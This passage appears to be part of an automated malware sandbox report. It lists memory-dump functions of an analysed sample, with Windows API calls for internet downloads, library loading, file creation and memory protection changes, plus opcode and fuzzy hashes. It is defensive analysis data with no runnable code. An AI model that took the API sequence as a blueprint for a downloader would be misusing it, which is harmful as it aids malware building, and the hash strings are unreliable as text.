                                  • Opcode Fuzzy Hash: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
                                  • Instruction Fuzzy Hash: DD9002A534100486D100615A441CB0A000597E1741FD2C125E1154514D865DCC527167
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
                                  • Instruction ID: 8983f75615fa2ed9070e6cd829f26b482c119897463b970db5b50ed9756d2c42
                                  • Opcode Fuzzy Hash: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
                                  • Instruction Fuzzy Hash: F29002A5202000474105715A441C71A400A57E0641BD2C131E1104550DC56988917166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564C71, Relevance: 5.1, APIs: 3, Instructions: 567networklibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(005655BE,00000000,00000000,00000000,00000000), ref: 00564CBE
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564DE8
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: InternetOpen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2631520674-0
                                  • Opcode ID: 25663db5c9adebbd64ffaac1f2099329b45e08c54c6e3ac6983c330320163da0
                                  • Instruction ID: 021831fec5ae9f5f085df1fc19d7f8cc7030f7d0b28c3d5b4ac5b847288221ff
                                  • Opcode Fuzzy Hash: 25663db5c9adebbd64ffaac1f2099329b45e08c54c6e3ac6983c330320163da0
                                  • Instruction Fuzzy Hash: B702797064430AAEFF301E24CD5ABEA3F26BF55350FA0452AFD46972C0E7B588C69B11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005642ED, Relevance: 4.6, APIs: 3, Instructions: 82sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __common_dcos_data.LIBCMT ref: 00564316
                                    • Part of subcall function 0056308C: TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563155
                                  • Sleep.KERNELBASE(00000005), ref: 005643BB
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: SleepTerminateThread__common_dcos_data
                                  • String ID:
                                  • API String ID: 1104745652-0
                                  • Opcode ID: 29ed3a171f2fb5c9d5cc45db78efd4ee64205965454525bc259405f27dbfd510
                                  • Instruction ID: 31e94c64c17dab7ffbb948228f53d3c9093c6e2de8cafc75ad0897cfac07dff3
                                  • Opcode Fuzzy Hash: 29ed3a171f2fb5c9d5cc45db78efd4ee64205965454525bc259405f27dbfd510
                                  • Instruction Fuzzy Hash: 7721E76464C31EEEEF202A6098ADBFD6E617F89328F704D17E84387156E66184C99D23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00563640, Relevance: 2.0, APIs: 1, Instructions: 463COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 05619c2dd8dd9ede88389a5cd591afee117554ed6cda60e689d04c1c0c96ee52
                                  • Instruction ID: d94043f2770cd52a4b003110457521d415ce9e428bcd58d9c4ba1d39ddb7a005
                                  • Opcode Fuzzy Hash: 05619c2dd8dd9ede88389a5cd591afee117554ed6cda60e689d04c1c0c96ee52
                                  • Instruction Fuzzy Hash: F4E18AB464030AAEFF201E24CC5ABE93F26BF56394F604629FD82671C1D7B64CC69B51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569473, Relevance: 1.6, APIs: 1, Instructions: 132filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: e2155ec5c30772141964017ec80f26b5d45cedf88f479a70a74eb8765bad9008
                                  • Instruction ID: e3844ac64ad509a8723ccac5d4674e416a60922eed5b6c5d844ca23b893ec1c8
                                  • Opcode Fuzzy Hash: e2155ec5c30772141964017ec80f26b5d45cedf88f479a70a74eb8765bad9008
                                  • Instruction Fuzzy Hash: BD41E030608202CEEF255D54C5A43F53EAEBF66360FB95A6EC803872A4CB758CC4E742
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005694D7, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e6307251db6b4910e2f696e968dc5cb3d060ffc6d0cbc741c5bd1e22c7e149a
                                  • Instruction ID: c8b3f22d5136f939cee1793c6901e52c6bae3d0fbe0d22f5b6f0fb6557f2c9b9
                                  • Opcode Fuzzy Hash: 9e6307251db6b4910e2f696e968dc5cb3d060ffc6d0cbc741c5bd1e22c7e149a
                                  • Instruction Fuzzy Hash: 5D41E330609212CEEF255D54C5A43F53EEEBF26364FB9596AC8438B2A4CB758CC4E742
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569567, Relevance: 1.6, APIs: 1, Instructions: 113filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: dfe84631668a3850e3a789edd0f8b5d00e047ce5474b06797e9182286092e8df
                                  • Instruction ID: 4113296765a03fe4c28cc63db7473d14d6f653a86730c601098e3a868a3d6c4c
                                  • Opcode Fuzzy Hash: dfe84631668a3850e3a789edd0f8b5d00e047ce5474b06797e9182286092e8df
                                  • Instruction Fuzzy Hash: 5231A330609211CEEF355E54C5A47F53EAEBF26364FA9595AC8438B2A4C7758CC0EB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569607, Relevance: 1.6, APIs: 1, Instructions: 101filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: ff9e4e6a9713c7d9121e7f157f12061185b9ef9bf8cf3d4a6778f19a71450a98
                                  • Instruction ID: 39099ebd5c4a68a06d4c4dddef2c0b21345a987fee68f1616c06c1a8c561e750
                                  • Opcode Fuzzy Hash: ff9e4e6a9713c7d9121e7f157f12061185b9ef9bf8cf3d4a6778f19a71450a98
                                  • Instruction Fuzzy Hash: FD31C530609211DEEF355E54C5A47F53EAEBB26360FB9595EC8438B2A4C7758CC0E782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056963B, Relevance: 1.6, APIs: 1, Instructions: 97filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: 8e09b70f85697e9bb85965fcdf983b8b577f2d2e3afc99550f2fb0b2553aa3d6
                                  • Instruction ID: def4ca9e5ab529e99991e6fab5bbac1b7ab3a5595d43162088bf1a33d18b3323
                                  • Opcode Fuzzy Hash: 8e09b70f85697e9bb85965fcdf983b8b577f2d2e3afc99550f2fb0b2553aa3d6
                                  • Instruction Fuzzy Hash: D031D530609211DEEF355E54C5A87F53EEEBB26360FA91A5EC8438B2A4C7754CC0E682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005696DB, Relevance: 1.6, APIs: 1, Instructions: 88filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: e501f50e5297a9d5c7c63763e2a8eba72345e7e4af12019107e8909eb7fb0833
                                  • Instruction ID: a8304ae05107ea4d7cb3f165c926ad288906599ebd2faf1e080c0e8056e23367
                                  • Opcode Fuzzy Hash: e501f50e5297a9d5c7c63763e2a8eba72345e7e4af12019107e8909eb7fb0833
                                  • Instruction Fuzzy Hash: 0221F830609211DEDF356E94C5A87F53EEEBF26360FA9195EC843972A4C7748CC0E682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564D4B, Relevance: 1.6, APIs: 1, Instructions: 87librarynetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564DE8
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: InternetLibraryLoadOpen
                                  • String ID:
                                  • API String ID: 2559873147-0
                                  • Opcode ID: 8101a8575c10ca4f04ed333643b4b61ed4e09d620fba8c521a7c6ad93dc9efc5
                                  • Instruction ID: c970c2d3290f0717453299022adbb82092558e3dc9cd2be06ce3e8dbb2432be7
                                  • Opcode Fuzzy Hash: 8101a8575c10ca4f04ed333643b4b61ed4e09d620fba8c521a7c6ad93dc9efc5
                                  • Instruction Fuzzy Hash: 8B212C342443479AFF304E24CD85BFE3B26BF44750FA08525EE499B185E771CD85AB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056406C, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: db9fab166e1db6180dd203e70a0d277151cb724f16c2bb8a4dd4fc0200dfa28d
                                  • Instruction ID: c035d16c7bc01262c70ca1829ce59f78e349bd68cbb7fccb19e22d9e1f35e7e9
                                  • Opcode Fuzzy Hash: db9fab166e1db6180dd203e70a0d277151cb724f16c2bb8a4dd4fc0200dfa28d
                                  • Instruction Fuzzy Hash: 5A11365194D24EDEEF302670986DBB92E257F9B328F748E4BA88343043AA5484C5D923
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056974B, Relevance: 1.6, APIs: 1, Instructions: 79filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: d0ad1deb002a49c5e33db92ee3e17a7a5bac69d399216450e359d93d424c53b0
                                  • Instruction ID: b7008f4fbad42b420c10b5cdaa09ae0626301ced1dccb3b7ae8215feadd6e86e
                                  • Opcode Fuzzy Hash: d0ad1deb002a49c5e33db92ee3e17a7a5bac69d399216450e359d93d424c53b0
                                  • Instruction Fuzzy Hash: FF210B30509211DEDF346E94C4A83F53EEDBF26364FA9195EC8429B2A4C7704CC0E682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056977B, Relevance: 1.6, APIs: 1, Instructions: 77filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: 6843b67d470d0d58e28ad20fdfce9031bc6c2163a9f3bf38b891eb31ca719bdf
                                  • Instruction ID: b28235d9ce5440b51859a0113c97638046b5fcfbf78cbc932ad991c4b75a8b66
                                  • Opcode Fuzzy Hash: 6843b67d470d0d58e28ad20fdfce9031bc6c2163a9f3bf38b891eb31ca719bdf
                                  • Instruction Fuzzy Hash: E921EB30509215DEDF346E94C5A83F53EEDBF26364FA9195EC852572A4C7B04CC0E782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005697B0, Relevance: 1.6, APIs: 1, Instructions: 73filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: 32db91660cb14d10184b2c108f169d85b7c588e75a9260605c9f06c8a829b3a3
                                  • Instruction ID: 30b0748f0e98f62951d6fa1f06a90923f01b8f999db53690727fb109372f3a1c
                                  • Opcode Fuzzy Hash: 32db91660cb14d10184b2c108f169d85b7c588e75a9260605c9f06c8a829b3a3
                                  • Instruction Fuzzy Hash: 3921E930505112DEDF346A94C1A83F53EEEBF263A4FA9595EC8429B2A4C7704CC0E782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564DA4, Relevance: 1.6, APIs: 1, Instructions: 73librarynetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564DE8
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: InternetLibraryLoadOpen
                                  • String ID:
                                  • API String ID: 2559873147-0
                                  • Opcode ID: 75ab1c5dbfe7b86250bf345fb59c08477a0683ded13e2d8e2815bf7610097a78
                                  • Instruction ID: e1c7936d08f10a4ed5497a8171931263c283554957b707f74ac4a3ece7265091
                                  • Opcode Fuzzy Hash: 75ab1c5dbfe7b86250bf345fb59c08477a0683ded13e2d8e2815bf7610097a78
                                  • Instruction Fuzzy Hash: 7C212B342443479AFF308E24CD84BFE3B2ABF04750FA08529DD499B285E776CD85AB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564DDF, Relevance: 1.6, APIs: 1, Instructions: 65librarynetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564DE8
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: InternetLibraryLoadOpen
                                  • String ID:
                                  • API String ID: 2559873147-0
                                  • Opcode ID: 5c8a7077bc9300df2e6680d4d128afcb958ddc6fcbbd17d7d5af1091da768881
                                  • Instruction ID: 61c4e1c492161abc6251272fcb6de2c7b73ef7105c85c9bc715d41d2cfdc8999
                                  • Opcode Fuzzy Hash: 5c8a7077bc9300df2e6680d4d128afcb958ddc6fcbbd17d7d5af1091da768881
                                  • Instruction Fuzzy Hash: 9511B4346443479AEF348E24CD94BEE3B66BF04310F908539DD499B685EB36CD85AB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056983B, Relevance: 1.6, APIs: 1, Instructions: 58filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: f9b46ddc5d2d07b7515d63581abf0019aa9578014d99b06c7ad7447975d3c162
                                  • Instruction ID: 07a3bca7da4a2d5d026cd07e69c6873b2bde32f1f1126cd40de2a47692fa3035
                                  • Opcode Fuzzy Hash: f9b46ddc5d2d07b7515d63581abf0019aa9578014d99b06c7ad7447975d3c162
                                  • Instruction Fuzzy Hash: 9C01B920509112DEEF39799481A53F53DEEBF263A4FA9195EC8439B26887714CC0F282
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005698B4, Relevance: 1.6, APIs: 1, Instructions: 50filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: 9d647ac3e4db3f202c2b8e796c49803d2873b4215aa936ef5b81ea56b0711af5
                                  • Instruction ID: aa1074da48c8ef1ec909b02bc8d8a08955136ea7f271e9a88f3ed16c2364e521
                                  • Opcode Fuzzy Hash: 9d647ac3e4db3f202c2b8e796c49803d2873b4215aa936ef5b81ea56b0711af5
                                  • Instruction Fuzzy Hash: AC01A9216091528E9E39759481E53F52EEEBD3B3A4BA9195EC9439B2688A710CC0E381
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00566EA1, Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 3b48514ba7cfa7d3aeb12649dc055d3cda20ad4e4739680c81b74c588ee5d4cf
                                  • Instruction ID: c94455fccaee847fde4e615663c1f0fffec693c0f2ce2a3880a3d49bb6ec60b0
                                  • Opcode Fuzzy Hash: 3b48514ba7cfa7d3aeb12649dc055d3cda20ad4e4739680c81b74c588ee5d4cf
                                  • Instruction Fuzzy Hash: EAF0286465D11ED9FF302574A89D7BC1D217B8D33CF308D17B45383045959084C9AD23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00566EFF, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 2658a02a4baffdbad4bde4d0acd80ddcfc4ce23a9fb107fc6faced7cd117b40c
                                  • Instruction ID: b35dbbd423857c49310e1e6c8d447e118e88d8e594b5d251beaf615ad09bf419
                                  • Opcode Fuzzy Hash: 2658a02a4baffdbad4bde4d0acd80ddcfc4ce23a9fb107fc6faced7cd117b40c
                                  • Instruction Fuzzy Hash: 43F0F61065D11ED9FF302574A89C7BC1D217B9D33CF708D17F45383046956484C9AD27
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564717, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,005646BF,0056477E), ref: 00564770
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 34ee2fa4ee83727fcd5ef8b232a3bd0440c3079be1460a703ef2b32f950c1231
                                  • Instruction ID: 716d85c4ed3298b5f3f5757b3e30510b6e8dcfb0cd39ac677eb5c08685bbcb5f
                                  • Opcode Fuzzy Hash: 34ee2fa4ee83727fcd5ef8b232a3bd0440c3079be1460a703ef2b32f950c1231
                                  • Instruction Fuzzy Hash: D2F0A7247407066BF73548145EF1FEA5687ABB3790F30813ABD46576C5C6A15C88D405
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00566F67, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 2f20d0e83176c073f4879b337adb5b50457bb6dbb1726776c23cf5b168e17f8f
                                  • Instruction ID: 325ae0cfc97f0390ed71748e4041e175b1ea510c61a32c7add1b697aa3c9a92a
                                  • Opcode Fuzzy Hash: 2f20d0e83176c073f4879b337adb5b50457bb6dbb1726776c23cf5b168e17f8f
                                  • Instruction Fuzzy Hash: 39F0BE2468C11EDAFF202674A88DBBC1E227B8E32CF308D17B46283046956480CDAE23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005699AF, Relevance: 1.5, APIs: 1, Instructions: 28filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: 3a5056362b1beb3e2fa896edd814650b5dc4a8641a489f79f803b43adc135938
                                  • Instruction ID: 167a73f71e93f95ce3a8c60563e2474b20c9fc34986286b7d425d2032f3c74b8
                                  • Opcode Fuzzy Hash: 3a5056362b1beb3e2fa896edd814650b5dc4a8641a489f79f803b43adc135938
                                  • Instruction Fuzzy Hash: D0E02610409113DA6E5DB4E8C5B62F62CFFBC293D46FA090ACD8367518493108C0E6C0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00567014, Relevance: 1.5, APIs: 1, Instructions: 26libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 3870f991cfe3e62dff8fc519a606d65977607df41da2df9b4a45888928f02144
                                  • Instruction ID: 633fe42ca455e9638c8c0ac148c430a9b5f7af0eeb1f54561c698be05b6d2c71
                                  • Opcode Fuzzy Hash: 3870f991cfe3e62dff8fc519a606d65977607df41da2df9b4a45888928f02144
                                  • Instruction Fuzzy Hash: 24E0DF3094C24ECB6B262A34180D1E82E217E5F3787784A6BE42387199D179808ADF32
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056704B, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 6c4769e9c642d87f89255136f7eb0e2766592d551440c0f9a9075ec007988d43
                                  • Instruction ID: 64315a25c29a97e9e30cd2d87000336187c791c2d44f7848b53bdc3557d896cf
                                  • Opcode Fuzzy Hash: 6c4769e9c642d87f89255136f7eb0e2766592d551440c0f9a9075ec007988d43
                                  • Instruction Fuzzy Hash: 61D02E24A4C60ECB2F202A38684C6EC2E217D8EB287748A17F82343084D670808ADE27
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056707F, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 08710a67d09a26126edabeff7311275fdc24c3bfedd17097a1429bb6b4d89aa1
                                  • Instruction ID: fabdd40bf0b7195251aa24f033800f7824a053dfd34586f1f2ed8309e0274ce3
                                  • Opcode Fuzzy Hash: 08710a67d09a26126edabeff7311275fdc24c3bfedd17097a1429bb6b4d89aa1
                                  • Instruction Fuzzy Hash: 79D02325E5D30CDFBF151A2054850EC2F223D4F328735CC57F4134B042D5758449DB25
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005670E7, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 0c858048cc1c826667e7793c18a248b6f135126bd6f899e663685dd49adb0c87
                                  • Instruction ID: a415d8f0b48184d69e8d0ddd6930d25d4d6a04513825bc6b463d6674e4a17506
                                  • Opcode Fuzzy Hash: 0c858048cc1c826667e7793c18a248b6f135126bd6f899e663685dd49adb0c87
                                  • Instruction Fuzzy Hash: 5CC09B30B5D71FD76F15255478D509C1B517A8A3197344937F4138B105D671C8499245
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056710F, Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000005), ref: 00567112
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: a86c045ad13f2d4a3b785944d747d7730d39e228a357565d174d66461f3eb0dc
                                  • Instruction ID: 84ec6f1e23d216be06f865e9458b3590d7e6bfa564e0335cd614da81ba829c8b
                                  • Opcode Fuzzy Hash: a86c045ad13f2d4a3b785944d747d7730d39e228a357565d174d66461f3eb0dc
                                  • Instruction Fuzzy Hash: C8B01234B9D63D9BAF113A247CC90CC1B616A8A31D3205137F013CB007DA71C88EC344
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
                                  • Instruction ID: ee8f6295c3d00ad3366357643f49832a070fdd6ca318626694bc1ea0cc8d5a11
                                  • Opcode Fuzzy Hash: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
                                  • Instruction Fuzzy Hash: 80B09B719014D5C9D611D761460C71B790177D0751F97C2A2D1120641E477CC0D1F6B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056439F, Relevance: 1.3, APIs: 1, Instructions: 13sleepnativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 005643BB
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564444
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectSleepVirtual
